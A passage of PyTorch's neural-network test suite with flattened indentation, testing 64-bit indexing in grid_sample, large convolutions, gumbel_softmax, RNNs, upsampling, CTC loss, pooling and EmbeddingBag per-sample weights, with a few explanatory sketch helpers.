padding_mode=padding_mode, align_corners=align_corners)
b.sum().backward()
self.assertEqual(a, b)
self.assertEqual(small_image.grad, large_view.grad)
small_image.grad.zero_()
large_view.grad.zero_()
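    # A short sketch (shape/stride values derived from the test above) of the
    # 64-bit indexing condition: im is [1, 1, 32769, 65536] contiguous, so
    # large_view = im[..., 127::128] has size (1, 1, 32769, 512) and keeps the
    # row stride 65536. The largest linear offset it touches is
    # sum((size - 1) * stride), which already exceeds 2**31; the test's
    # sum(size * stride) check is a cheap over-approximation of that quantity.
    def _strided_view_64bit_sketch(self):
        size, stride = (1, 1, 32769, 512), (2147549184, 2147549184, 65536, 128)
        max_offset = sum((s - 1) * st for s, st in zip(size, stride))
        assert max_offset >= 2 ** 31  # indexing this view needs 64-bit arithmetic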
@dtypes(torch.float, torch.double)
@largeTensorTest(lambda self, device, dtype:
# Compute sum of the large tensor sizes:
# (im.numel() + small_image.numel() + small_image.grad.numel() +
# large_view.grad.numel()) * sizeof(dtype)
2 * 32769 * (32768 + 3 * 32768 / 128) *
torch.tensor([], dtype=dtype).element_size())
def test_grid_sample_large_index_3d(self, device, dtype):
# Test 64-bit indexing with grid_sample (gh-41656)
        # Try accessing the corners; there should be no segfault
coords = torch.full((1, 2, 2, 2, 3), 1., device=device, dtype=dtype)
im = torch.zeros([1, 1, 2, 32769, 32768], device=device, dtype=dtype)
result = F.grid_sample(im, coords, align_corners=False)
self.assertEqual(result, torch.zeros((1, 1, 2, 2, 2), device=device, dtype=dtype))
# Compare sampling with large strides to the same op on a contiguous tensor
coords = torch.rand(1, 1, 4, 4, 3, device=device, dtype=dtype)
large_view = im[..., 127::128]
small_image = torch.rand_like(large_view)
large_view[...] = small_image
small_image.requires_grad, large_view.requires_grad = True, True
self.assertTrue(
sum(i * s for i, s in zip(large_view.size(), large_view.stride())) >= 2 ** 31,
msg="View must use 64-bit indexing")
for mode, padding_mode, align_corners in itertools.product(
('nearest', 'bilinear'), ('zeros', 'border', 'reflection'), (True, False)):
a = F.grid_sample(
small_image, coords, mode=mode,
padding_mode=padding_mode, align_corners=align_corners)
a.sum().backward()
b = F.grid_sample(
large_view, coords, mode=mode,
padding_mode=padding_mode, align_corners=align_corners)
b.sum().backward()
self.assertEqual(a, b)
self.assertEqual(small_image.grad, large_view.grad)
small_image.grad.zero_()
large_view.grad.zero_()
@onlyCUDA
@largeTensorTest('12GB')
def test_conv_transposed_large(self, device):
dtype = torch.half if self.device_type == 'cuda' else torch.float
conv = nn.ConvTranspose2d(1, 1, 1, 1, bias=False).to(device).to(dtype)
input_large = torch.randn(4096, 1, 512, 1024, dtype=dtype, device=device)
# forward
ret = conv(input_large)
maxdiff0 = (ret.narrow(0, 0, 1024) - conv(input_large.narrow(0, 0, 1024))).abs_().max().item()
maxdiff1 = (ret.narrow(0, 1024, 1024) - conv(input_large.narrow(0, 1024, 1024))).abs_().max().item()
maxdiff2 = (ret.narrow(0, 2048, 1024) - conv(input_large.narrow(0, 2048, 1024))).abs_().max().item()
maxdiff3 = (ret.narrow(0, 3072, 1024) - conv(input_large.narrow(0, 3072, 1024))).abs_().max().item()
self.assertEqual(maxdiff0, 0)
self.assertEqual(maxdiff1, 0)
self.assertEqual(maxdiff2, 0)
self.assertEqual(maxdiff3, 0)
@onlyCUDA
@skipCUDAIfRocm
@largeTensorTest('12GB')
def test_conv_large(self, device):
dtype = torch.half if self.device_type == 'cuda' else torch.float
conv = nn.Conv2d(2, 2, 8, 8, bias=False).to(device).to(dtype)
input_large = torch.randn(4097, 2, 512, 512, dtype=dtype, device=device)
# forward
ret = conv(input_large)
self.assertEqual(ret[:2048], conv(input_large[:2048]))
self.assertEqual(ret[2048:4096], conv(input_large[2048:4096]))
self.assertEqual(ret[4096:], conv(input_large[4096:]))
# backward
conv.zero_grad()
        # When computing the backward, we use `max(dim=1)` to create some
        # sparsity. Without this sparsity, the rounding error would be too
        # large (as large as 1e-5) to satisfy the criterion (1e-6) of `assertEqual`
ret.view(4097, -1).max(dim=1).values.sum().backward()
del ret
grad1 = conv.weight.grad.detach().clone()
conv.zero_grad()
conv(input_large[:2048]).view(2048, -1).max(dim=1).values.sum().backward()
conv(input_large[2048:4096]).view(2048, -1).max(dim=1).values.sum().backward()
conv(input_large[4096:]).view(1, -1).max(dim=1).values.sum().backward()
grad2 = conv.weight.grad.detach().clone()
        # gradients are on the order of hundreds; we need to scale them to
        # the order of one so that we can compare
scale = 1 / grad1.abs().mean()
grad1 = grad1 * scale
grad2 = grad2 * scale
self.assertEqual(grad1, grad2)
def _test_gumbel_softmax_st_shapes(self, device, dtype, shape, dim, count_expected):
logits = torch.randn(shape, dtype=torch.float, device=device)
logits = logits.to(dtype)
y_draw = F.gumbel_softmax(logits, hard=True, dim=dim)
        # All values non-negative
self.assertGreaterEqual(y_draw.min(), 0)
# Shape unchanged
self.assertTrue(y_draw.shape == logits.shape)
# One choice per draw
self.assertEqual(y_draw.sum(), count_expected, atol=torch.finfo(y_draw.dtype).eps, rtol=0)
def _test_gumbel_softmax_straight_through(self, device, dtype):
num_draws = 100
logits = torch.tensor([[0.2, 0.8, 0.1]], device=device)
logits = logits.reshape([1, 3])
logits = logits.to(dtype).requires_grad_()
probs = logits.softmax(dim=-1)
counts = torch.zeros_like(logits)
for _ in range(num_draws):
y_draw = F.gumbel_softmax(logits, hard=True)
counts = counts + y_draw
            # All values non-negative
self.assertGreaterEqual(y_draw.min(), 0)
# Each experiment should result in 1 draw.
self.assertEqual(counts.sum(), num_draws, atol=torch.finfo(counts.dtype).eps, rtol=0)
        # Check that the results are asymptotically as expected.
        expected = probs * num_draws
        # z is approximately N(0, 1) for unbiased counts
        z = (counts - expected) / (expected * (1 - probs)).sqrt()
        # A (lazy) approximate 99% two-sided test: the check fails with
        # probability alpha >~ 0.01 even when sampling is unbiased
self.assertLess(z.abs().max().item(), 2.58)
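    # A brief sketch (with made-up numbers) of the normal approximation used
    # above: a category drawn with probability p over n trials has a
    # Binomial(n, p) count, so (count - n*p) / sqrt(n*p*(1-p)) is roughly
    # N(0, 1) when sampling is unbiased, and |z| < 2.58 covers about 99% of draws.
    def _count_z_score_sketch(self):
        n, p, count = 100, 0.5, 56  # hypothetical observed count
        z = (count - n * p) / math.sqrt(n * p * (1 - p))
        assert abs(z) < 2.58  # consistent with unbiased sampling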
def _test_gumbel_softmax_grad(self, device, dtype):
# "hard" and "not hard" should propagate same gradient.
logits_soft = torch.zeros(10, 10, dtype=dtype, device=device, requires_grad=True)
logits_hard = torch.zeros(10, 10, dtype=dtype, device=device, requires_grad=True)
seed = torch.random.get_rng_state()
y_soft = F.gumbel_softmax(logits_soft, hard=False)
torch.random.set_rng_state(seed)
y_hard = F.gumbel_softmax(logits_hard, hard=True)
y_soft.sum().backward()
y_hard.sum().backward()
# 2eps = 1x addition + 1x subtraction.
tol = 2 * torch.finfo(dtype).eps
self.assertEqual(logits_soft.grad, logits_hard.grad, atol=tol, rtol=0)
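    # A minimal sketch (assuming the hard path uses the straight-through trick,
    # i.e. y = y_hard - y_soft.detach() + y_soft) of why "hard" and "soft"
    # gumbel_softmax share a gradient: the forward value is the one-hot y_hard,
    # but backward only sees the differentiable y_soft path.
    def _straight_through_sketch(self):
        logits = torch.randn(4, requires_grad=True)
        weights = torch.arange(4.)
        y_soft = logits.softmax(-1)
        index = y_soft.argmax(-1, keepdim=True)
        y_hard = torch.zeros_like(y_soft).scatter_(-1, index, 1.0)
        y = y_hard.detach() - y_soft.detach() + y_soft
        (y * weights).sum().backward()
        grad_hard = logits.grad.clone()
        logits.grad = None
        (logits.softmax(-1) * weights).sum().backward()
        assert torch.allclose(grad_hard, logits.grad)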
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float, torch.double)
def test_gumbel_softmax(self, device, dtype):
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5], dim=0, count_expected=1)
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5], dim=-1, count_expected=1)
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5, 4], dim=1, count_expected=5)
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5, 4, 3], dim=1, count_expected=5 * 3)
self._test_gumbel_softmax_st_shapes(device, dtype, shape=[5, 4, 3], dim=-1, count_expected=5 * 4)
self._test_gumbel_softmax_straight_through(device, dtype)
self._test_gumbel_softmax_grad(device, dtype)
def _test_rnn_retain_variables(self, device, dtype):
rnns = [nn.LSTM(10, 20, num_layers=2).to(device, dtype),
nn.GRU(10, 20, num_layers=2).to(device, dtype),
nn.RNN(10, 20, num_layers=2).to(device, dtype)]
for rnn in rnns:
input = torch.randn(5, 6, 10, device=device, dtype=dtype, requires_grad=True)
output = rnn(input)
output[0].sum().backward(retain_graph=True)
grads = [input.grad.data.clone()] + [p.grad.data.clone() for p in rnn.parameters()]
for _ in range(4):
rnn.zero_grad()
input.grad.data.zero_()
output[0].sum().backward(retain_graph=True)
grads2 = [input.grad.data] + [p.grad.data for p in rnn.parameters()]
self.assertEqual(grads, grads2)
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.double)
def test_rnn_retain_variables(self, device, dtype):
self._test_rnn_retain_variables(device, dtype)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_rnn_retain_variables(device, dtype)
@onlyCUDA
def test_upsamplingNearest1d_launch_config(self, device):
m = nn.Upsample(scale_factor=2)
inp = torch.rand(2**25, 1, 1, device=device)
out = m(inp)
inp_ref = inp.cpu()
out_ref = m(inp_ref)
self.assertEqual(out_ref, out)
@onlyCUDA
def test_upsamplingNearest2d_launch_config(self, device):
m = nn.Upsample(scale_factor=2)
inp = torch.rand(2**25, 1, 1, 1, device=device)
out = m(inp)
inp_ref = inp.cpu()
out_ref = m(inp_ref)
self.assertEqual(out_ref, out)
@onlyCUDA
def test_upsamplingNearest3d_launch_config(self, device):
m = nn.Upsample(scale_factor=2)
inp = torch.rand(2**25, 1, 1, 1, 1, device=device)
out = m(inp)
inp_ref = inp.cpu()
out_ref = m(inp_ref)
self.assertEqual(out_ref, out)
@unittest.expectedFailure
@skipIfRocm
@onlyCUDA
def test_upsamplingNearest2d_launch_fail(self, device):
m = nn.Upsample(scale_factor=2)
# launch grid_y == 2**16 (larger than maximum y-dimension limit 65535)
inp = torch.rand(1, 1, 2**15, 2**8, device=device)
out = m(inp)
@onlyCUDA
@skipCUDAIfNotRocm
def test_upsamplingNearest2d_launch_rocm(self, device):
# test_upsamplingNearest2d_launch_fail should run OK on ROCm
m = nn.Upsample(scale_factor=2)
inp = torch.rand(1, 1, 2**15, 2**8, device=device)
out = m(inp)
@onlyCUDA
@skipCUDAIfCudnnVersionLessThan(7600)
def test_CTCLoss_cudnn(self, device):
def _helper(zero_infinity):
target_lengths = [30, 25, 20]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (sum(target_lengths),), dtype=torch.int)
log_probs = torch.randn(50, 3, 15, dtype=torch.float, device=device).log_softmax(2).requires_grad_()
log_probs_ref = log_probs.detach().clone().requires_grad_()
with torch.backends.cudnn.flags(enabled=True):
res = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, zero_infinity=zero_infinity)
res.backward()
expected = ctcloss_reference(log_probs, targets.cuda(), input_lengths, target_lengths).float()
with torch.backends.cudnn.flags(enabled=False):
res2 = torch.nn.functional.ctc_loss(log_probs_ref, targets.cuda().long(), input_lengths, target_lengths,
zero_infinity=zero_infinity)
res2.backward()
self.assertEqual(res, expected)
self.assertEqual(res2, res)
self.assertEqual(log_probs.grad, log_probs_ref.grad)
_helper(zero_infinity=True)
_helper(zero_infinity=False)
@onlyCUDA
@skipCUDAIfNoCudnn
def test_contig_wrong_stride_cudnn(self, device):
# x has to have batch_size 1 to test contiguous checks
x = torch.randn(1, 16, 5, 5, device=device)
stride = list(x.stride())
stride[0] = 20
        # Change the stride in dimension 0; the tensor is still contiguous because size[0] is 1
x.set_(x.storage(), 0, x.size(), stride)
self.assertTrue(x.is_contiguous())
F.conv_transpose2d(x, torch.randn(16, 1, 1, 1, device=device))
F.conv2d(x, torch.randn(1, 16, 1, 1, device=device))
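    # A tiny sketch (illustrative, not used above) of the contiguity rule this
    # test exploits: the stride of a size-1 dimension never affects memory
    # layout, so a tensor can report is_contiguous() with an arbitrary stride there.
    def _size_one_stride_sketch(self):
        x = torch.randn(1, 4)
        y = x.as_strided(x.size(), (100, 1))  # arbitrary stride in the size-1 dim
        assert y.is_contiguous()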
@onlyCUDA
def test_Conv2d_size_1_kernel(self, device):
x_cpu = torch.randn(2, 3, 5, 5)
conv_cpu = torch.nn.Conv2d(3, 3, kernel_size=1)
y_cpu = conv_cpu(x_cpu)
y = torch.rand_like(y_cpu)
y_cpu.backward(y)
with cudnn.flags(enabled=False):
conv_cuda = torch.nn.Conv2d(3, 3, kernel_size=1).to(device)
conv_cuda.bias.data.copy_(conv_cpu.bias.data)
conv_cuda.weight.data.copy_(conv_cpu.weight.data)
y_cuda = conv_cuda(x_cpu.to(device))
y_cuda.backward(y.to(device))
self.assertEqual(y_cpu, y_cuda, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.bias.grad.data, conv_cuda.bias.grad.data, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.weight.grad.data, conv_cuda.weight.grad.data, atol=1e-5, rtol=0, exact_device=False)
@onlyCUDA
def test_ConvTranspose2d_size_1_kernel(self, device):
x_cpu = torch.randn(2, 3, 5, 5)
conv_cpu = torch.nn.ConvTranspose2d(3, 3, kernel_size=1)
y_cpu = conv_cpu(x_cpu)
y = torch.rand_like(y_cpu)
y_cpu.backward(y)
with cudnn.flags(enabled=False):
conv_cuda = torch.nn.ConvTranspose2d(3, 3, kernel_size=1).to(device)
conv_cuda.bias.data.copy_(conv_cpu.bias.data)
conv_cuda.weight.data.copy_(conv_cpu.weight.data)
y_cuda = conv_cuda(x_cpu.to(device))
y_cuda.backward(y.to(device))
self.assertEqual(y_cpu, y_cuda, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.bias.grad.data, conv_cuda.bias.grad.data, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.weight.grad.data, conv_cuda.weight.grad.data, atol=1e-5, rtol=0, exact_device=False)
@onlyCUDA
def test_ConvTranspose3d_size_1_kernel(self, device):
x_cpu = torch.randn(2, 3, 3, 5, 5)
conv_cpu = torch.nn.ConvTranspose3d(3, 3, kernel_size=1)
y_cpu = conv_cpu(x_cpu)
y = torch.rand_like(y_cpu)
y_cpu.backward(y)
with cudnn.flags(enabled=False):
conv_cuda = torch.nn.ConvTranspose3d(3, 3, kernel_size=1).to(device)
conv_cuda.bias.data.copy_(conv_cpu.bias.data)
conv_cuda.weight.data.copy_(conv_cpu.weight.data)
y_cuda = conv_cuda(x_cpu.to(device))
y_cuda.backward(y.to(device))
self.assertEqual(y_cpu, y_cuda, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.bias.grad.data, conv_cuda.bias.grad.data, atol=1e-5, rtol=0, exact_device=False)
self.assertEqual(conv_cpu.weight.grad.data, conv_cuda.weight.grad.data, atol=1e-5, rtol=0, exact_device=False)
def _ordered_sequence(self, device, dtype):
"""Create ordered list of random sequences"""
seqs = [torch.empty(random.randint(1, 6), device=device, dtype=dtype)
for _ in range(5)]
seqs = [s.random_(-128, 128) for s in seqs]
ordered = sorted(seqs, key=len, reverse=True)
return ordered
def _padded_sequence(self, device, dtype):
"""Create Tensor of random padded sequences"""
ordered = self._ordered_sequence(device, dtype)
lengths = [len(i) for i in ordered]
padded_tensor = rnn_utils.pad_sequence(ordered)
return padded_tensor, lengths
@onlyCUDA
def test_device_mask(self, device):
for enforce_sorted in [True, False]:
padded, lengths = self._padded_sequence('cpu', torch.float)
packed = rnn_utils.pack_padded_sequence(
padded, lengths, enforce_sorted=enforce_sorted)
self.assertFalse(packed.is_cuda)
packed = packed.to(device)
self.assertTrue(packed.is_cuda)
unpacked, _ = rnn_utils.pad_packed_sequence(packed)
self.assertTrue(unpacked.is_cuda)
self.assertEqual(unpacked.dtype, torch.float)
@onlyCUDA
def test_overwrite_module_params_on_conversion_cpu_device(self, device):
# Test that under the current default settings
# (`torch.__future__.get_overwrite_module_params_on_conversion() == False`),
# a view to a module's parameters is not pointing to the same storage as
# its base variable after converting the module to a different device.
m = nn.Linear(20, 10)
mw = m.weight[:]
m.to(device)
with torch.no_grad():
# Without using `torch.no_grad()`, this will leak CUDA memory.
# (Issue is filed at https://github.com/pytorch/pytorch/issues/21875)
mw[0][0] = 5
self.assertTrue(mw[0][0].device.type == "cpu")
self.assertTrue(mw._base[0][0].device.type == "cuda")
try:
torch.__future__.set_overwrite_module_params_on_conversion(True)
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# a view to a module's parameters is still pointing to the same storage as
# its base variable after converting the module to a different device.
m = nn.Linear(20, 10)
mw = m.weight[:]
m.to(device)
with torch.no_grad():
mw[0][0] = 5
self.assertTrue(mw[0][0] == mw._base[0][0])
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# `cpu_module.to("cuda")` doesn't preserve previous references to
# `cpu_module`'s parameters or gradients.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20)
weight_ref = m.weight
weight_grad_ref = m.weight.grad
m.to(device)
self.assertNotEqual(weight_ref.device, m.weight.device)
self.assertNotEqual(weight_grad_ref.device, m.weight.grad.device)
finally:
torch.__future__.set_overwrite_module_params_on_conversion(False)
@onlyCUDA
@dtypes(*ALL_TENSORTYPES2)
def test_embedding_max_norm_device(self, device, dtype):
embedding = nn.Embedding(22, 5, max_norm=1.0).to(device, dtype=dtype)
# nn.Embedding only takes LongTensor as input
input = torch.tensor([2, 8, 8, 6], device=device, dtype=torch.long)
output = embedding(input)
self.assertEqual(output[1], output[2])
self.assertTrue(output.data.norm(p=2, dim=1).le(1).all())
# Test fails on Vg20
@skipCUDAIfRocm
@onlyCUDA
@dtypes(torch.half, torch.float)
def test_softmax(self, device, dtype):
input = torch.rand(32, 100, device=device, dtype=dtype, requires_grad=True)
inputf = input.to(torch.float).detach().requires_grad_(True)
out = F.softmax(input, dim=-1, dtype=torch.float)
outf = F.softmax(inputf, dim=-1)
# should be bitwise equal
self.assertEqual(out, outf, atol=0, rtol=0)
gO = torch.empty_like(outf).uniform_()
out.backward(gO)
outf.backward(gO)
# should be bitwise equal
self.assertEqual(input.grad, inputf.grad.to(dtype), atol=0, rtol=0)
@onlyCUDA
def test_pool3d_size_one_feature_dim(self, device):
# Tests crazy strides for feature dim of size 1
x = torch.randn(7, 1, 5, 3, 2, device=device)
strange_strides = [30, 1234, 6, 2, 1]
y = x.as_strided(x.size(), strange_strides)
x = x.cpu().as_strided(x.size(), strange_strides)
to_test = {
'max_pool3d': lambda t: F.max_pool3d(t, (5, 1, 1), stride=(5, 1, 1)),
'avg_pool3d': lambda t: F.avg_pool3d(t, (5, 1, 1), stride=(5, 1, 1)),
}
for test, fn in to_test.items():
# Should not crash
out_y = fn(y)
out_x = fn(x)
self.assertEqual(out_y, out_x.to(device), msg=test)
@onlyCUDA
@largeTensorTest('6GB')
def test_pool3d_large_size_int64(self, device):
# See https://github.com/pytorch/pytorch/issues/52822
x = torch.randn(70, 32, 100, 100, 100, dtype=torch.half, device=device)
y = torch.nn.functional.max_pool3d(x, 5)
torch.cuda.synchronize()
ref_x = x.cpu().float() # max_pool3d_cpu is not implemented for half
ref_y = torch.nn.functional.max_pool3d(ref_x, 5)
self.assertEqual(y, ref_y, exact_dtype=False)
@onlyCUDA
def test_AvgPool3d_backward_after_cat_dim1_device(self, device):
# x has to have batch_size 1 to test contiguous checks
x = torch.randn(1, 3, 4, 4, 4, device=device, requires_grad=True)
y = F.avg_pool3d(x, kernel_size=3, padding=1, stride=2)
grad = torch.randn(y.size(), device=device)
        # Increase the stride in dimension 0; the tensor is still contiguous because size[0] is 1
stride = list(grad.stride())
stride[0] = stride[0] * 2
grad.set_(grad.storage(), 0, grad.size(), stride)
assert grad.is_contiguous()
y.backward(grad)
def test_pooling_size_empty(self, device):
t = torch.rand([1, 2, 3, 4], device=device)
self.assertRaises(RuntimeError, lambda: F.adaptive_avg_pool1d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_avg_pool2d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_avg_pool3d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_max_pool1d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_max_pool2d(t, []))
self.assertRaises(RuntimeError, lambda: F.adaptive_max_pool3d(t, []))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long)))
def test_embedding_bag_empty_input(self, device, dtypes):
m = 4
n = 3
x = torch.tensor([], device=device, dtype=dtypes[0])
for sparse in [True, False]:
Embed = torch.nn.EmbeddingBag(m, n, sparse=sparse)
Embed.to(device)
output = Embed(input=x, offsets=torch.tensor([0], device=device, dtype=dtypes[1]))
self.assertEqual(output, torch.zeros_like(output))
output = Embed(input=x, offsets=torch.tensor([0, 0], device=device, dtype=dtypes[1]))
self.assertEqual(output, torch.zeros_like(output))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long)))
def test_EmbeddingBag_per_sample_weights_failures(self, device, dtypes):
# Failure 1: mismatched embeddings / per_sample_weights dtype
es = nn.EmbeddingBag(5, 2, mode='sum').to(dtype=torch.float, device=device)
input = torch.tensor([3, 1, 1, 1, 4, 0], dtype=dtypes[0], device=device)
offsets = torch.tensor([0, 0, 3, 3, 6], dtype=dtypes[1], device=device)
per_sample_weights = torch.randn_like(input, dtype=torch.double, device=device)
if device == 'cpu':
with self.assertRaisesRegex(RuntimeError, 'have the same type as'):
es(input, offsets, per_sample_weights)
else:
with self.assertRaisesRegex(RuntimeError, 'expected scalar type'):
es(input, offsets, per_sample_weights)
# Failure 2.1: input/per_sample_weights have different sizes (1d input)
input = torch.tensor([3, 1, 1, 1, 4, 0], dtype=dtypes[0], device=device)
offsets = torch.tensor([0, 0, 3, 3, 6], dtype=dtypes[1], device=device)
per_sample_weights = torch.randn(5, dtype=torch.float, device=device)
with self.assertRaisesRegex(ValueError, 'same shape as the input'):
es(input, offsets, per_sample_weights)
# Failure 2.2: input/per_sample_weights have different sizes (2d input)
input = torch.randint(5, (7, 3), dtype=dtypes[0], device=device)
offsets = None
per_sample_weights = torch.randn(7 * 3, dtype=torch.float, device=device)
with self.assertRaisesRegex(ValueError, 'same shape as the input'):
es(input, offsets, per_sample_weights)
# Failure 3: Unsupported per_sample_weights and mode=('max', 'mean')
for unsupported_mode in ('max', 'mean'):
es = nn.EmbeddingBag(5, 2, mode=unsupported_mode).to(
dtype=torch.float, device=device)
input = torch.randint(5, (7, 3), dtype=dtypes[0], device=device)
offsets = None
per_sample_weights = torch.randn(7, 3, dtype=torch.float, device=device)
with self.assertRaisesRegex(NotImplementedError,
"only supported for mode='sum'"):
es(input, offsets, per_sample_weights)
def _embedding_bag_reference_impl(self, input, weight, offsets=None, mode='sum',
per_sample_weights=None, include_last_offset=False):
assert mode == 'sum' or per_sample_weights is None
assert offsets is not None
if per_sample_weights is None:
per_sample_weights = torch.ones(input.size()).to(
dtype=weight.dtype, device=weight.device
)
assert input.numel() == per_sample_weights.numel()
bags = []
long_input = input.to(torch.long)
embeddings = weight.index_select(0, long_input) * per_sample_weights.unsqueeze(1)
if include_last_offset:
for index in range(len(offsets) - 1):
offset = offsets[index]
next_offset = offsets[index + 1]
length = next_offset - offset
if length == 0:
bags.append(
torch.tensor([0] * weight.size(1)).to(
dtype=embeddings.dtype, device=embeddings.device
)
)
else:
if mode == 'sum':
bags.append(embeddings.narrow(0, offset, length).sum(0))
elif mode == 'mean':
bags.append(embeddings.narrow(0, offset, length).sum(0).div(length))
else:
assert mode == 'max'
bags.append(embeddings.narrow(0, offset, length).max(0)[0])
else:
for index, offset in enumerate(offsets):
if index + 1 < len(offsets):
next_offset = offsets[index + 1]
else:
next_offset = len(long_input)
length = next_offset - offset
if length == 0:
bags.append(
torch.tensor([0] * weight.size(1)).to(
dtype=embeddings.dtype, device=embeddings.device
)
)
else:
if mode == 'sum':
bags.append(embeddings.narrow(0, offset, length).sum(0))
elif mode == 'mean':
bags.append(embeddings.narrow(0, offset, length).sum(0).div(length))
else:
assert mode == 'max'
bags.append(embeddings.narrow(0, offset, length).max(0)[0])
return torch.stack(bags)
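    # A worked example (values mirror the tests below) of the reference
    # implementation in 'sum' mode: with weight rows w[i] = [2i+1, 2i+2]
    # (i.e. arange(1, 11).view(5, 2)), input [3, 1, 1] for one bag gives
    # w[3] + w[1] + w[1] = [7, 8] + [3, 4] + [3, 4] = [13, 16].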
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_EmbeddingBag_empty_per_sample_weights_and_offsets(self, device, dtypes):
        # Test empty input and per-sample weights, and the backward pass. There
        # was a CUDA invalid-configuration bug (more context in #46572).
def test_per_sample_weights(mode, trainable_scale):
es = nn.EmbeddingBag(5, 2, mode=mode).to(dtype=dtypes[2], device=device)
es.weight.data.copy_(
torch.arange(1, 11, device=device, dtype=dtypes[2]).view_as(es.weight))
input = torch.tensor([], device=device, dtype=dtypes[0])
offsets = torch.tensor([0, 0, 0, 0, 0], device=device, dtype=dtypes[1])
per_sample_weights = torch.randn_like(input, dtype=dtypes[2]) \
.requires_grad_(trainable_scale)
ref_per_sample_weights = \
per_sample_weights.detach().requires_grad_(trainable_scale)
reference_weights = es.weight.detach().requires_grad_()
expected = self._embedding_bag_reference_impl(
input, reference_weights, offsets, mode, ref_per_sample_weights)
result = es(input, offsets, per_sample_weights)
self.assertEqual(result, expected, atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
grad = torch.randn_like(expected)
result.backward(grad)
            # The reference impl doesn't have a grad fn for empty input, but the
            # grad should simply be a zero tensor
ref_weights_grad = torch.zeros_like(es.weight)
self.assertEqual(es.weight.grad, ref_weights_grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
if trainable_scale:
ref_per_sample_weights_grad = torch.empty_like(per_sample_weights)
self.assertEqual(per_sample_weights.grad, ref_per_sample_weights_grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
modes = ('sum',)
trainable_scale = (True, False)
for mode, trainable in itertools.product(modes, trainable_scale):
test_per_sample_weights(mode, trainable)
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_EmbeddingBag_per_sample_weights_and_offsets(self, device, dtypes):
def test_per_sample_weights(mode, trainable_scale):
es = nn.EmbeddingBag(5, 2, mode=mode).to(dtype=dtypes[2], device=device)
es.weight.data.copy_(
torch.arange(1, 11, device=device, dtype=dtypes[2]).view_as(es.weight))
input = torch.tensor([3, 1, 1, 1, 4, 0], device=device, dtype=dtypes[0])
offsets = torch.tensor([0, 0, 3, 3, 6], device=device, dtype=dtypes[1])
per_sample_weights = torch.randn_like(input, dtype=dtypes[2]) \
.requires_grad_(trainable_scale)
ref_per_sample_weights = \
per_sample_weights.detach().requires_grad_(trainable_scale)
reference_weights = es.weight.detach().requires_grad_()
expected = self._embedding_bag_reference_impl(
input, reference_weights, offsets, mode, ref_per_sample_weights)
result = es(input, offsets, per_sample_weights)
self.assertEqual(result, expected, atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
grad = torch.randn_like(expected).to(dtype=dtypes[2], device=device)
result.backward(grad)
expected.backward(grad)
self.assertEqual(es.weight.grad, reference_weights.grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
if trainable_scale:
self.assertEqual(per_sample_weights.grad, ref_per_sample_weights.grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
modes = ('sum',)
trainable_scale = (True, False)
for mode, trainable in itertools.product(modes, trainable_scale):
test_per_sample_weights(mode, trainable)
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_EmbeddingBag_per_sample_weights_and_new_offsets(self, device, dtypes):
def test_per_sample_weights_new_offsets(mode, trainable_scale, include_last_offset, has_weight=True):
es = nn.EmbeddingBag(5, 2, mode=mode, include_last_offset=include_last_offset).to(dtype=dtypes[2], device=device)
es.weight.data.copy_(
torch.arange(1, 11, device=device, dtype=dtypes[2]).view_as(es.weight))
input = torch.tensor([3, 1, 1, 1, 4, 0], device=device, dtype=dtypes[0])
offsets = torch.tensor([0, 0, 3, 3, 6], device=device, dtype=dtypes[1])
if include_last_offset:
offsets = torch.cat((offsets, torch.tensor([input.size(0)], device=device, dtype=dtypes[1])), 0)
if has_weight:
per_sample_weights = torch.randn_like(input, device=device, dtype=dtypes[2]) \
.requires_grad_(trainable_scale)
ref_per_sample_weights = \
per_sample_weights.detach().requires_grad_(trainable_scale)
else:
per_sample_weights = None
ref_per_sample_weights = None
reference_weights = es.weight.detach().requires_grad_()
expected = self._embedding_bag_reference_impl(
input, reference_weights, offsets, mode, ref_per_sample_weights, include_last_offset)
result = es(input, offsets, per_sample_weights)
self.assertEqual(result, expected, atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
grad = torch.randn_like(expected)
result.backward(grad)
expected.backward(grad)
self.assertEqual(es.weight.grad, reference_weights.grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
